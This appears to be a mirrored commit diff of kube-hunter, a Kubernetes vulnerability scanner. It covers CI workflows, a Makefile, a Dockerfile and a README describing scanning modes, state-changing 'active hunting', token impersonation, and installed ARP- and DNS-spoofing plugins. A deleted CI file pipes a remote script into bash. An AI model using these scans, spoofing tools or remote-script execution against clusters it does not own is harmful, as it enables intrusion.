Mirror of https://github.com/aquasecurity/kube-hunter.git (synced 2026-02-14 18:09:56 +00:00)

Comparing refactor_h...main: 102 commits
Commits (SHA1 only):

bc47f08e88, 3e1347290b, 7479aae9ba, e8827b24f6, ff9f2c536f, eb31026d8e,
a578726495, c442172715, d7df38fc95, 9ce385a190, ebd8e2e405, 585b490f19,
6c4ad4f6fd, e6a3c12098, 2a7020682e, e1896f3983, fc7fbbf1fc, 7c62cc21af,
c17aa17096, 4204879251, a746bd0eb1, b379e64314, 00eb0dfa87, 8d045fb1a8,
83b19d4208, 473e4fe2b5, f67f08225c, c96312b91e, a7d26452fb, e63efddf9f,
6689005544, 0b90e0e43d, 65eefed721, 599e9967e3, 5745f4a32b, 1a26653007,
cdd9f9d432, 99678f3cac, cdbc3dc12b, d208b43532, 42250d9f62, d94d86a4c1,
a1c2c3ee3e, 6aeee7f49d, f95df8172b, a3ad928f29, 22d6676e08, b9e0ef30e8,
693d668d0a, 2e4684658f, f5e8b14818, 05094a9415, 8acedf2e7d, 14ca1b8bce,
5a578fd8ab, bf7023d01c, d7168af7d5, 35873baa12, a476d9383f, 6a3c7a885a,
b6be309651, 0d5b3d57d3, 69057acf9b, e63200139e, ad4cfe1c11, 24b5a709ad,
9cadc0ee41, 3950a1c2f2, 7530e6fee3, 72ae8c0719, b341124c20, 3e06647b4c,
cd1f79a658, 2428e2e869, daf53cb484, d6ca666447, 3ba926454a, 78e16729e0,
78c0133d9d, 4484ad734f, a0127659b7, f034c8c7a1, 4cb2c8bad9, 14d73e201e,
6d63f55d18, 124a51d84f, 0f1739262f, 9ddf3216ab, e7585f4ed3, 6c34a62e39,
69a31f87e9, f33c04bd5b, 11efbb7514, ac5dd40b74, bf646f5e0c, a8128b7ea0,
e75c0ff37b, fe187bc50a, 77227799a4, df12d75d6d, a4a8c71653, fe3dba90d8
.dockerignore (new file, 4 lines)
@@ -0,0 +1,4 @@
+*.png
+tests/
+docs/
+.github/
.flake8 (new file, 6 lines)
@@ -0,0 +1,6 @@
+[flake8]
+ignore = E203, E266, E501, W503, B903, T499, B020
+max-line-length = 120
+max-complexity = 18
+select = B,C,E,F,W,B9,T4
+mypy_config=mypy.ini
.github/PULL_REQUEST_TEMPLATE.md (vendored; 2 lines changed)
@@ -7,7 +7,7 @@
 Please include a summary of the change and which issue is fixed. Also include relevant motivation and context. List any dependencies that are required for this change.

 ## Contribution Guidelines
-Please Read through the [Contribution Guidelines](https://github.com/aquasecurity/kube-hunter/blob/master/CONTRIBUTING.md).
+Please Read through the [Contribution Guidelines](https://github.com/aquasecurity/kube-hunter/blob/main/CONTRIBUTING.md).

 ## Fixed Issues
.github/workflows/lint.yml (vendored; new file, 14 lines)
@@ -0,0 +1,14 @@
+---
+name: Lint
+
+on: [push, pull_request]
+
+jobs:
+  build:
+    runs-on: ubuntu-20.04
+
+    steps:
+      - uses: actions/checkout@v2
+      - uses: actions/setup-python@v2
+      - uses: pre-commit/action@v2.0.0
+      - uses: ibiqlik/action-yamllint@v3
.github/workflows/publish.yml (vendored; new file, 95 lines)
@@ -0,0 +1,95 @@
+---
+name: Publish
+on:
+  push:
+    tags:
+      - "v*"
+env:
+  ALIAS: aquasecurity
+  REP: kube-hunter
+jobs:
+  dockerhub:
+    name: Publish To Docker Hub
+    runs-on: ubuntu-18.04
+    steps:
+      - name: Check Out Repo
+        uses: actions/checkout@v2
+      - name: Set up QEMU
+        uses: docker/setup-qemu-action@v1
+      - name: Set up Docker Buildx
+        id: buildx
+        uses: docker/setup-buildx-action@v1
+      - name: Cache Docker layers
+        uses: actions/cache@v2
+        with:
+          path: /tmp/.buildx-cache
+          key: ${{ runner.os }}-buildxarch-${{ github.sha }}
+          restore-keys: |
+            ${{ runner.os }}-buildxarch-
+      - name: Login to Docker Hub
+        uses: docker/login-action@v1
+        with:
+          username: ${{ secrets.DOCKERHUB_USER }}
+          password: ${{ secrets.DOCKERHUB_TOKEN }}
+      - name: Login to ECR
+        uses: docker/login-action@v1
+        with:
+          registry: public.ecr.aws
+          username: ${{ secrets.ECR_ACCESS_KEY_ID }}
+          password: ${{ secrets.ECR_SECRET_ACCESS_KEY }}
+      - name: Get version
+        id: get_version
+        uses: crazy-max/ghaction-docker-meta@v3
+        with:
+          images: ${{ env.REP }}
+          tag-semver: |
+            {{version}}
+
+      - name: Build and push - Docker/ECR
+        id: docker_build
+        uses: docker/build-push-action@v2
+        with:
+          context: .
+          platforms: linux/amd64
+          builder: ${{ steps.buildx.outputs.name }}
+          push: true
+          tags: |
+            ${{ secrets.DOCKERHUB_USER }}/${{ env.REP }}:${{ steps.get_version.outputs.version }}
+            public.ecr.aws/${{ env.ALIAS }}/${{ env.REP }}:${{ steps.get_version.outputs.version }}
+            ${{ secrets.DOCKERHUB_USER }}/${{ env.REP }}:latest
+            public.ecr.aws/${{ env.ALIAS }}/${{ env.REP }}:latest
+          cache-from: type=local,src=/tmp/.buildx-cache/release
+          cache-to: type=local,mode=max,dest=/tmp/.buildx-cache/release
+
+      - name: Image digest
+        run: echo ${{ steps.docker_build.outputs.digest }}
+
+  pypi:
+    name: Publish To PyPI
+    runs-on: ubuntu-18.04
+    steps:
+      - name: Checkout code
+        uses: actions/checkout@v2
+
+      - name: Set up Python
+        uses: actions/setup-python@v2
+        with:
+          python-version: '3.9'
+
+      - name: Install dependencies
+        shell: bash
+        run: |
+          pip install -U pip
+          make deps
+
+      - name: Build project
+        shell: bash
+        run: |
+          python -m pip install wheel
+          make build
+
+      - name: Publish distribution package to PyPI
+        if: startsWith(github.ref, 'refs/tags')
+        uses: pypa/gh-action-pypi-publish@master
+        with:
+          password: ${{ secrets.PYPI_API_TOKEN }}
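Both jobs above fire only on tags matching `v*`. A minimal sketch of cutting a release that triggers them (the version number is illustrative):

```bash
# Tag the release commit and push the tag; this triggers the Publish workflow.
git tag v0.6.8
git push origin v0.6.8
```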
.github/workflows/release.yml (vendored; new file, 55 lines)
@@ -0,0 +1,55 @@
+---
+on:
+  push:
+    # Sequence of patterns matched against refs/tags
+    tags:
+      - 'v*'  # Push events to matching v*, i.e. v1.0, v20.15.10
+
+name: Release
+
+jobs:
+  build:
+    name: Upload Release Asset
+    runs-on: ubuntu-18.04
+    steps:
+      - name: Checkout code
+        uses: actions/checkout@v2
+
+      - name: Set up Python
+        uses: actions/setup-python@v2
+        with:
+          python-version: '3.8'
+
+      - name: Install dependencies
+        shell: bash
+        run: |
+          pip install -U pip
+          pip install pyinstaller
+          make deps
+
+      - name: Build project
+        shell: bash
+        run: |
+          make pyinstaller
+
+      - name: Create Release
+        id: create_release
+        uses: actions/create-release@v1
+        env:
+          GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
+        with:
+          tag_name: ${{ github.ref }}
+          release_name: ${{ github.ref }}
+          draft: false
+          prerelease: false
+
+      - name: Upload Release Asset
+        id: upload-release-asset
+        uses: actions/upload-release-asset@v1
+        env:
+          GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
+        with:
+          upload_url: ${{ steps.create_release.outputs.upload_url }}
+          asset_path: ./dist/kube-hunter
+          asset_name: kube-hunter-linux-x86_64-${{ github.ref }}
+          asset_content_type: application/octet-stream
.github/workflows/test.yml (vendored; new file, 55 lines)
@@ -0,0 +1,55 @@
+---
+name: Test
+
+on: [push, pull_request]
+
+env:
+  FORCE_COLOR: 1
+
+jobs:
+  build:
+    runs-on: ${{ matrix.os }}
+    strategy:
+      fail-fast: false
+      matrix:
+        python-version: ["3.6", "3.7", "3.8", "3.9"]
+        os: [ubuntu-20.04, ubuntu-18.04]
+
+    steps:
+      - uses: actions/checkout@v2
+
+      - name: Set up Python ${{ matrix.python-version }}
+        uses: actions/setup-python@v2
+        with:
+          python-version: ${{ matrix.python-version }}
+
+      - name: Get pip cache dir
+        id: pip-cache
+        run: |
+          echo "::set-output name=dir::$(pip cache dir)"
+
+      - name: Cache
+        uses: actions/cache@v2
+        with:
+          path: ${{ steps.pip-cache.outputs.dir }}
+          key:
+            ${{ matrix.os }}-${{ matrix.python-version }}-${{ hashFiles('requirements-dev.txt') }}
+          restore-keys: |
+            ${{ matrix.os }}-${{ matrix.python-version }}-
+
+      - name: Install dependencies
+        shell: bash
+        run: |
+          pip install -U pip
+          make dev-deps
+          make install
+
+      - name: Test
+        shell: bash
+        run: |
+          make test
+
+      - name: Upload coverage
+        uses: codecov/codecov-action@v1
+        with:
+          name: ${{ matrix.os }} Python ${{ matrix.python-version }}
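The matrix job above can be reproduced locally against a single interpreter with the same Makefile targets the workflow calls; a sketch, assuming Python 3.6+ and GNU make:

```bash
pip install -U pip
make dev-deps   # pip install -r requirements-dev.txt
make install    # pip install .
make test       # python -m pytest
```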
.gitignore (vendored; 23 lines changed)
@@ -1,12 +1,33 @@
*.pyc
.venv
.dockerignore
*aqua*
venv/
.vscode
.coverage
.idea

# Distribution / packaging
.Python
env/
build/
develop-eggs/
dist/
downloads/
eggs/
lib/
lib64/
parts/
sdist/
var/
*.egg-info/
.installed.cfg
*.egg
*.spec
.eggs
pip-wheel-metadata

# Directory Cache Files
.DS_Store
thumbs.db
__pycache__
.mypy_cache
.pre-commit-config.yaml (new file, 11 lines)
@@ -0,0 +1,11 @@
+---
+repos:
+  - repo: https://github.com/psf/black
+    rev: stable
+    hooks:
+      - id: black
+  - repo: https://gitlab.com/pycqa/flake8
+    rev: 3.7.9
+    hooks:
+      - id: flake8
+        additional_dependencies: [flake8-bugbear]
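With this config in place, the same black and flake8 hooks that the Lint workflow runs can also guard local commits, as CONTRIBUTING.md suggests; a sketch:

```bash
pip install pre-commit
pre-commit install          # install the git hook so checks run on every commit
pre-commit run --all-files  # or lint the entire tree once
```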
.travis.yml (deleted, 24 lines)
@@ -1,24 +0,0 @@
-group: travis_latest
-language: python
-cache: pip
-python:
-  #- "3.4"
-  #- "3.5"
-  - "3.6"
-  - "3.7"
-install:
-  - pip install -r requirements.txt
-  - pip install -r requirements-dev.txt
-before_script:
-  # stop the build if there are Python syntax errors or undefined names
-  - flake8 . --count --select=E901,E999,F821,F822,F823 --show-source --statistics
-  # exit-zero treats all errors as warnings. The GitHub editor is 127 chars wide
-  - flake8 . --count --exit-zero --max-complexity=10 --max-line-length=127 --statistics
-  - pip install pytest coverage pytest-cov
-script:
-  - python runtest.py
-after_success:
-  - bash <(curl -s https://codecov.io/bash)
-notifications:
-  on_success: change
-  on_failure: change  # `always` will be the setting once code changes slow down
.yamllint (new file, 6 lines)
@@ -0,0 +1,6 @@
+---
+extends: default
+
+rules:
+  line-length: disable
+  truthy: disable
CONTRIBUTING.md
@@ -1,4 +1,17 @@
-Thank you for taking interest in contributing to kube-hunter!
+## Contribution Guide
+
+## Welcome Aboard
+
+Thank you for taking interest in contributing to kube-hunter!
+This guide will walk you through the development process of kube-hunter.
+
+## Setting Up
+
+kube-hunter is written in Python 3 and supports versions 3.6 and above.
+You'll probably want to create a virtual environment for your local project.
+Once you have your project and IDE set up, you can `make dev-deps` and start contributing!
+You may also install a pre-commit hook to take care of linting - `pre-commit install`.
+
+## Issues
+
+- Feel free to open issues for any reason, as long as you make it clear whether the issue is about a bug/feature/hunter/question/comment.
Dockerfile (29 lines changed)
@@ -1,25 +1,32 @@
-FROM python:3.7-alpine3.10 as builder
+FROM python:3.8-alpine as builder

 RUN apk add --no-cache \
     linux-headers \
     tcpdump \
     build-base \
-    ebtables
+    ebtables \
+    make \
+    git && \
+    apk upgrade --no-cache

 WORKDIR /kube-hunter
-COPY ./requirements.txt /kube-hunter/.
-RUN pip install -r /kube-hunter/requirements.txt -t /kube-hunter
+COPY setup.py setup.cfg Makefile ./
+RUN make deps

-COPY . /kube-hunter
+COPY . .
+RUN make install

-FROM python:3.7-alpine3.10
+FROM python:3.8-alpine

 RUN apk add --no-cache \
-    tcpdump
-RUN apk upgrade --no-cache
+    tcpdump \
+    ebtables && \
+    apk upgrade --no-cache

-COPY --from=builder /kube-hunter /kube-hunter
+COPY --from=builder /usr/local/lib/python3.8/site-packages /usr/local/lib/python3.8/site-packages
+COPY --from=builder /usr/local/bin/kube-hunter /usr/local/bin/kube-hunter

 WORKDIR /kube-hunter
+# Add default plugins: https://github.com/aquasecurity/kube-hunter-plugins
+RUN pip install kube-hunter-arp-spoof>=0.0.3 kube-hunter-dns-spoof>=0.0.3

-ENTRYPOINT ["python", "kube-hunter.py"]
+ENTRYPOINT ["kube-hunter"]
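A sketch of building the plugin-free image from this Dockerfile and probing the host's interfaces, per the README's container instructions (the local image tag is arbitrary):

```bash
docker build -t kube-hunter .
docker run -it --rm --network host kube-hunter
```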
Makefile (new file, 67 lines)
@@ -0,0 +1,67 @@
.SILENT: clean

NAME := kube-hunter
SRC := kube_hunter
ENTRYPOINT := $(SRC)/__main__.py
DIST := dist
COMPILED := $(DIST)/$(NAME)
STATIC_COMPILED := $(COMPILED).static


.PHONY: deps
deps:
	requires=$(shell mktemp)
	python setup.py -q dependencies > $$requires
	pip install -r $$requires
	rm $$requires

.PHONY: dev-deps
dev-deps:
	pip install -r requirements-dev.txt

.PHONY: lint
lint:
	black .
	flake8

.PHONY: lint-check
lint-check:
	flake8
	black --check --diff .

.PHONY: test
test:
	python -m pytest

.PHONY: build
build:
	python setup.py sdist bdist_wheel

.PHONY: pyinstaller
pyinstaller: deps
	python setup.py pyinstaller

.PHONY: staticx_deps
staticx_deps:
	command -v patchelf > /dev/null 2>&1 || (echo "patchelf is not available. install it in order to use staticx" && false)

.PHONY: pyinstaller_static
pyinstaller_static: staticx_deps pyinstaller
	staticx $(COMPILED) $(STATIC_COMPILED)

.PHONY: install
install:
	pip install .

.PHONY: uninstall
uninstall:
	pip uninstall $(NAME)

.PHONY: publish
publish:
	twine upload dist/*

.PHONY: clean
clean:
	rm -rf build/ dist/ *.egg-info/ .eggs/ .pytest_cache/ .mypy_cache .coverage *.spec
	find . -type d -name __pycache__ -exec rm -rf '{}' +
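A sketch of the static-binary flow the last targets enable, assuming a Debian-like host; the Makefile checks for patchelf but does not install staticx or pyinstaller itself, so those pip installs are assumptions here:

```bash
sudo apt-get install -y patchelf   # checked by the staticx_deps target
pip install pyinstaller staticx    # assumed prerequisites (not installed by the Makefile)
make pyinstaller_static            # builds dist/kube-hunter, then dist/kube-hunter.static
```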
README.md (183 lines changed)
@@ -1,41 +1,56 @@
[](https://travis-ci.org/aquasecurity/kube-hunter)
[](https://codecov.io/gh/aquasecurity/kube-hunter)
[](https://github.com/aquasecurity/kube-hunter/blob/master/LICENSE)
[](https://microbadger.com/images/aquasec/kube-hunter "Get your own image badge on microbadger.com")

## Notice
kube-hunter is not under active development anymore. If you're interested in scanning Kubernetes clusters for known vulnerabilities, we recommend using [Trivy](https://github.com/aquasecurity/trivy). Specifically, Trivy's Kubernetes [misconfiguration scanning](https://blog.aquasec.com/trivy-kubernetes-cis-benchmark-scanning) and [KBOM vulnerability scanning](https://blog.aquasec.com/scanning-kbom-for-vulnerabilities-with-trivy). Learn more in the [Trivy Docs](https://aquasecurity.github.io/trivy/).

---

kube-hunter hunts for security weaknesses in Kubernetes clusters. The tool was developed to increase awareness and visibility for security issues in Kubernetes environments. **You should NOT run kube-hunter on a Kubernetes cluster that you don't own!**

**Run kube-hunter**: kube-hunter is available as a container (aquasec/kube-hunter), and we also offer a web site at [kube-hunter.aquasec.com](https://kube-hunter.aquasec.com) where you can register online to receive a token allowing you to see and share the results online. You can also run the Python code yourself as described below.

**Explore vulnerabilities**: The kube-hunter knowledge base includes articles about discoverable vulnerabilities and issues. When kube-hunter reports an issue, it will show its VID (Vulnerability ID) so you can look it up in the KB at https://aquasecurity.github.io/kube-hunter/
+_If you're interested in kube-hunter's integration with the Kubernetes ATT&CK Matrix, [Continue Reading](#kuberentes-attck-matrix)_

**Contribute**: We welcome contributions, especially new hunter modules that perform additional tests. If you would like to develop your modules please read [Guidelines For Developing Your First kube-hunter Module](src/README.md).

-[kube-hunter demo video](https://youtu.be/s2-6rTkH8a8?t=57s)
+[](https://youtu.be/s2-6rTkH8a8?t=57s)

-Table of Contents
-=================
+## Table of Contents
+
+- [Table of Contents](#table-of-contents)
+- [Kubernetes ATT&CK Matrix](#kubernetes-attck-matrix)
+- [Hunting](#hunting)
+  - [Where should I run kube-hunter?](#where-should-i-run-kube-hunter)
+  - [Scanning options](#scanning-options)
+  - [Authentication](#authentication)
+  - [Active Hunting](#active-hunting)
+  - [List of tests](#list-of-tests)
+  - [Nodes Mapping](#nodes-mapping)
+  - [Output](#output)
+  - [Dispatching](#dispatching)
+- [Advanced Usage](#advanced-usage)
+  - [Azure Quick Scanning](#azure-quick-scanning)
+  - [Custom Hunting](#custom-hunting)
+- [Deployment](#deployment)
+  - [On Machine](#on-machine)
+    - [Prerequisites](#prerequisites)
+    - [Install with pip](#install-with-pip)
+    - [Run from source](#run-from-source)
+  - [Container](#container)
+  - [Pod](#pod)
+- [Contribution](#contribution)
+- [License](#license)
+
+## Kubernetes ATT&CK Matrix
+
+kube-hunter now supports the new format of the Kubernetes ATT&CK matrix.
+While kube-hunter's vulnerabilities are a collection of creative techniques designed to mimic an attacker in the cluster (or outside it),
+MITRE's ATT&CK defines more general, standardised categories of techniques for doing so.
+
+You can think of kube-hunter vulnerabilities as small steps for an attacker, which follow the track of a more general technique an attacker would aim for.
+Most of kube-hunter's hunters and vulnerabilities fall closely under those techniques; that's why we moved to follow the Matrix standard.
+
+_Some kube-hunter vulnerabilities that we could not map to a MITRE technique are prefixed with the `General` keyword_

-* [Hunting](#hunting)
-  * [Where should I run kube-hunter?](#where-should-i-run-kube-hunter)
-  * [Scanning options](#scanning-options)
-  * [Active Hunting](#active-hunting)
-  * [List of tests](#list-of-tests)
-  * [Nodes Mapping](#nodes-mapping)
-  * [Output](#output)
-  * [Dispatching](#dispatching)
-* [Deployment](#deployment)
-  * [On Machine](#on-machine)
-    * [Prerequisites](#prerequisites)
-  * [Container](#container)
-  * [Pod](#pod)

## Hunting

### Where should I run kube-hunter?

There are three different ways to run kube-hunter, each providing a different approach to detecting weaknesses in your cluster:
@@ -44,7 +59,8 @@ Run kube-hunter on any machine (including your laptop), select Remote scanning a

You can run kube-hunter directly on a machine in the cluster, and select the option to probe all the local network interfaces.

-You can also run kube-hunter in a pod within the cluster. This indicates how exposed your cluster would be if one of your application pods is compromised (through a software vulnerability, for example).
+You can also run kube-hunter in a pod within the cluster. This indicates how exposed your cluster would be if one of your application pods is compromised (through a software vulnerability, for example). (_`--pod` flag_)

### Scanning options
@@ -55,17 +71,37 @@ By default, kube-hunter will open an interactive session, in which you will be a
1. **Remote scanning**

   To specify remote machines for hunting, select option 1 or use the `--remote` option. Example:
-   `./kube-hunter.py --remote some.node.com`
+   `kube-hunter --remote some.node.com`

2. **Interface scanning**

   To specify interface scanning, you can use the `--interface` option (this will scan all of the machine's network interfaces). Example:
-   `./kube-hunter.py --interface`
+   `kube-hunter --interface`

3. **Network scanning**

   To specify a specific CIDR to scan, use the `--cidr` option. Example:
-   `./kube-hunter.py --cidr 192.168.0.0/24`
+   `kube-hunter --cidr 192.168.0.0/24`

+4. **Kubernetes node auto-discovery**
+
+   Set the `--k8s-auto-discover-nodes` flag to query Kubernetes for all nodes in the cluster, and then attempt to scan them all. By default, it will use [in-cluster config](https://kubernetes.io/docs/reference/access-authn-authz/rbac/) to connect to the Kubernetes API. If you'd like to use an explicit kubeconfig file, set `--kubeconfig /location/of/kubeconfig/file` (see the sketch below).
+
+   Also note that this is always done when using `--pod` mode.
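A sketch of node auto-discovery from outside the cluster with an explicit kubeconfig (the path is illustrative):

```bash
kube-hunter --k8s-auto-discover-nodes --kubeconfig ~/.kube/config
```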
### Authentication

In order to mimic an attacker in its early stages, kube-hunter requires no authentication for the hunt.

* **Impersonate** - You can provide kube-hunter with a specific service account token to use when hunting by manually passing the JWT Bearer token of the service-account secret with the `--service-account-token` flag (see the sketch after this list).

    Example:
    ```bash
    $ kube-hunter --active --service-account-token eyJhbGciOiJSUzI1Ni...
    ```

* When running with the `--pod` flag, kube-hunter uses the service account token [mounted inside the pod](https://kubernetes.io/docs/reference/access-authn-authz/service-accounts-admin/) to authenticate to services it finds during the hunt.
  * If specified, the `--service-account-token` flag takes priority when running as a pod.
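A sketch of extracting a token from an existing service-account secret and impersonating it, as described in the list above (the namespace and secret name are illustrative; on clusters with token-request support, `kubectl create token <sa>` can mint one directly):

```bash
# Decode the token of an existing service-account secret (names are illustrative)
TOKEN=$(kubectl -n default get secret my-sa-token -o jsonpath='{.data.token}' | base64 -d)
kube-hunter --active --service-account-token "$TOKEN"
```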

### Active Hunting
@@ -73,23 +109,23 @@ Active hunting is an option in which kube-hunter will exploit vulnerabilities it
The main difference between normal and active hunting is that a normal hunt will never change the state of the cluster, while active hunting can potentially do state-changing operations on the cluster, **which could be harmful**.

By default, kube-hunter does not do active hunting. To active hunt a cluster, use the `--active` flag. Example:
-`./kube-hunter.py --remote some.domain.com --active`
+`kube-hunter --remote some.domain.com --active`

### List of tests
You can see the list of tests with the `--list` option. Example:
-`./kube-hunter.py --list`
+`kube-hunter --list`

To see active hunting tests as well as passive:
-`./kube-hunter.py --list --active`
+`kube-hunter --list --active`

### Nodes Mapping
To see only a mapping of your nodes network, run with the `--mapping` option. Example:
-`./kube-hunter.py --cidr 192.168.0.0/24 --mapping`
+`kube-hunter --cidr 192.168.0.0/24 --mapping`
This will output all the Kubernetes nodes kube-hunter has found.

### Output
To control logging, you can specify a log level using the `--log` option. Example:
-`./kube-hunter.py --active --log WARNING`
+`kube-hunter --active --log WARNING`
Available log levels are:

* DEBUG
@@ -98,7 +134,7 @@ Available log levels are:

### Dispatching
By default, the report will be dispatched to `stdout`, but you can specify different methods by using the `--dispatch` option. Example:
-`./kube-hunter.py --report json --dispatch http`
+`kube-hunter --report json --dispatch http`
Available dispatch methods are:

* stdout (default)
@@ -106,18 +142,75 @@ Available dispatch methods are:
  * KUBEHUNTER_HTTP_DISPATCH_URL (defaults to: https://localhost)
  * KUBEHUNTER_HTTP_DISPATCH_METHOD (defaults to: POST)
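A sketch of wiring the http dispatcher with the two environment variables above (the collector URL is illustrative):

```bash
export KUBEHUNTER_HTTP_DISPATCH_URL=https://reports.example.com/kube-hunter
export KUBEHUNTER_HTTP_DISPATCH_METHOD=POST
kube-hunter --report json --dispatch http
```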

## Advanced Usage

### Azure Quick Scanning

When running **as a Pod in an Azure or AWS environment**, kube-hunter will fetch subnets from the Instance Metadata Service. Naturally, this makes the discovery process take longer.
To hard-limit subnet scanning to a `/24` CIDR, use the `--quick` option.

### Custom Hunting

Custom hunting lets advanced users control which hunters get registered at the start of a hunt.
**If you know what you are doing**, this can help if you want to adjust kube-hunter's hunting and discovery process for your needs.

Example:
```
kube-hunter --custom <HunterName1> <HunterName2>
```
Enabling custom hunting removes all hunters from the hunting process, except the given whitelisted hunters.

The `--custom` flag reads a list of hunter class names. To view all of kube-hunter's class names, combine the `--raw-hunter-names` flag with the `--list` flag.

Example:
```
kube-hunter --active --list --raw-hunter-names
```

**Notice**: Due to kube-hunter's architectural design, the following "Core Hunters/Classes" will always register (even when using custom hunting):
* HostDiscovery
  * _Generates IP addresses for the hunt from the given configuration_
  * _Automatically discovers subnets using cloud metadata APIs_
* FromPodHostDiscovery
  * _Auto-discovers attack-surface IP addresses for the hunt using Pod-based environment techniques_
  * _Automatically discovers subnets using cloud metadata APIs_
* PortDiscovery
  * _Port-scans the given IP addresses for known Kubernetes service ports_
* Collector
  * _Collects discovered vulnerabilities and open services for the future report_
* StartedInfo
  * _Prints the start message_
* SendFullReport
  * _Dispatches the report based on the given configuration_

## Deployment
There are three methods for deploying kube-hunter:

### On Machine

-You can run the kube-hunter python code directly on your machine.
+You can run kube-hunter directly on your machine.

#### Prerequisites

You will need the following installed:
* python 3.x
* pip

##### Install with pip

Install:
~~~
pip install kube-hunter
~~~

Run:
~~~
kube-hunter
~~~

##### Run from source
Clone the repository:
~~~
git clone https://github.com/aquasecurity/kube-hunter.git
@@ -130,15 +223,18 @@ pip install -r requirements.txt
~~~

Run:
-`./kube-hunter.py`
+~~~
+python3 kube_hunter
+~~~

-_If you want to use pyinstaller/py2exe you need to first run the install_imports.py script._

### Container
-Aqua Security maintains a containerized version of kube-hunter at `aquasec/kube-hunter`. This container includes this source code, plus an additional (closed source) reporting plugin for uploading results into a report that can be viewed at [kube-hunter.aquasec.com](https://kube-hunter.aquasec.com). Please note that running the `aquasec/kube-hunter` container and uploading report data are subject to additional [terms and conditions](https://kube-hunter.aquasec.com/eula.html).
+Aqua Security maintains a containerized version of kube-hunter at `aquasec/kube-hunter:aqua`. This container includes this source code, plus an additional (closed source) reporting plugin for uploading results into a report that can be viewed at [kube-hunter.aquasec.com](https://kube-hunter.aquasec.com). Please note that running the `aquasec/kube-hunter` container and uploading report data are subject to additional [terms and conditions](https://kube-hunter.aquasec.com/eula.html).

The Dockerfile in this repository allows you to build a containerized version without the reporting plugin.

If you run the kube-hunter container with the host network, it will be able to probe all the interfaces on the host:

`docker run -it --rm --network host aquasec/kube-hunter`

@@ -156,5 +252,8 @@ The example `job.yaml` file defines a Job that will run kube-hunter in a pod, us
* Find the pod name with `kubectl describe job kube-hunter`
* View the test results with `kubectl logs <pod name>`

## Contribution
To read the contribution guidelines, <a href="https://github.com/aquasecurity/kube-hunter/blob/main/CONTRIBUTING.md"> Click here </a>

## License
-This repository is available under the [Apache License 2.0](https://github.com/aquasecurity/kube-hunter/blob/master/LICENSE).
+This repository is available under the [Apache License 2.0](https://github.com/aquasecurity/kube-hunter/blob/main/LICENSE).
SECURITY.md (new file, 17 lines)
@@ -0,0 +1,17 @@
# Security Policy

## Supported Versions

| Version | Supported          |
| ------- | ------------------ |
| 0.4.x   | :white_check_mark: |
| 0.3.x   | :white_check_mark: |

## Reporting a Vulnerability
We encourage you to find vulnerabilities in kube-hunter.
The process is simple: just report a Bug issue and we will take a look at it.
If you prefer to disclose privately, you can write to one of the security maintainers at:

| Name        | Email                   |
| ----------- | ----------------------- |
| Daniel Sagi | daniel.sagi@aquasec.com |
Gemfile.lock (docs site dependencies)
@@ -1,11 +1,12 @@
 GEM
   remote: https://rubygems.org/
   specs:
-    activesupport (4.2.11.1)
-      i18n (~> 0.7)
+    activesupport (6.0.3.4)
+      concurrent-ruby (~> 1.0, >= 1.0.2)
+      i18n (>= 0.7, < 2)
       minitest (~> 5.1)
       thread_safe (~> 0.3, >= 0.3.4)
       tzinfo (~> 1.1)
+      zeitwerk (~> 2.2, >= 2.2.2)
     addressable (2.7.0)
       public_suffix (>= 2.0.2, < 5.0)
     coffee-script (2.4.1)
@@ -15,65 +16,67 @@ GEM
     colorator (1.1.0)
     commonmarker (0.17.13)
       ruby-enum (~> 0.5)
-    concurrent-ruby (1.1.5)
-    dnsruby (1.61.3)
-      addressable (~> 2.5)
-    em-websocket (0.5.1)
+    concurrent-ruby (1.1.7)
+    dnsruby (1.61.5)
+      simpleidn (~> 0.1)
+    em-websocket (0.5.2)
       eventmachine (>= 0.12.9)
       http_parser.rb (~> 0.6.0)
     ethon (0.12.0)
       ffi (>= 1.3.0)
     eventmachine (1.2.7)
     execjs (2.7.0)
-    faraday (0.17.0)
+    faraday (1.3.0)
+      faraday-net_http (~> 1.0)
       multipart-post (>= 1.2, < 3)
-    ffi (1.11.1)
+      ruby2_keywords
+    faraday-net_http (1.0.1)
+    ffi (1.14.2)
     forwardable-extended (2.6.0)
     gemoji (3.0.1)
-    github-pages (201)
-      activesupport (= 4.2.11.1)
+    github-pages (209)
      github-pages-health-check (= 1.16.1)
-      jekyll (= 3.8.5)
-      jekyll-avatar (= 0.6.0)
+      jekyll (= 3.9.0)
+      jekyll-avatar (= 0.7.0)
      jekyll-coffeescript (= 1.1.1)
      jekyll-commonmark-ghpages (= 0.1.6)
      jekyll-default-layout (= 0.1.4)
-      jekyll-feed (= 0.11.0)
+      jekyll-feed (= 0.15.1)
      jekyll-gist (= 1.5.0)
-      jekyll-github-metadata (= 2.12.1)
-      jekyll-mentions (= 1.4.1)
-      jekyll-optional-front-matter (= 0.3.0)
+      jekyll-github-metadata (= 2.13.0)
+      jekyll-mentions (= 1.6.0)
+      jekyll-optional-front-matter (= 0.3.2)
      jekyll-paginate (= 1.1.0)
-      jekyll-readme-index (= 0.2.0)
-      jekyll-redirect-from (= 0.14.0)
-      jekyll-relative-links (= 0.6.0)
-      jekyll-remote-theme (= 0.4.0)
+      jekyll-readme-index (= 0.3.0)
+      jekyll-redirect-from (= 0.16.0)
+      jekyll-relative-links (= 0.6.1)
+      jekyll-remote-theme (= 0.4.2)
      jekyll-sass-converter (= 1.5.2)
-      jekyll-seo-tag (= 2.5.0)
-      jekyll-sitemap (= 1.2.0)
-      jekyll-swiss (= 0.4.0)
+      jekyll-seo-tag (= 2.6.1)
+      jekyll-sitemap (= 1.4.0)
+      jekyll-swiss (= 1.0.0)
      jekyll-theme-architect (= 0.1.1)
      jekyll-theme-cayman (= 0.1.1)
      jekyll-theme-dinky (= 0.1.1)
-      jekyll-theme-hacker (= 0.1.1)
+      jekyll-theme-hacker (= 0.1.2)
      jekyll-theme-leap-day (= 0.1.1)
      jekyll-theme-merlot (= 0.1.1)
      jekyll-theme-midnight (= 0.1.1)
      jekyll-theme-minimal (= 0.1.1)
      jekyll-theme-modernist (= 0.1.1)
-      jekyll-theme-primer (= 0.5.3)
+      jekyll-theme-primer (= 0.5.4)
      jekyll-theme-slate (= 0.1.1)
      jekyll-theme-tactile (= 0.1.1)
      jekyll-theme-time-machine (= 0.1.1)
-      jekyll-titles-from-headings (= 0.5.1)
-      jemoji (= 0.10.2)
-      kramdown (= 1.17.0)
-      liquid (= 4.0.0)
-      listen (= 3.1.5)
+      jekyll-titles-from-headings (= 0.5.3)
+      jemoji (= 0.12.0)
+      kramdown (= 2.3.0)
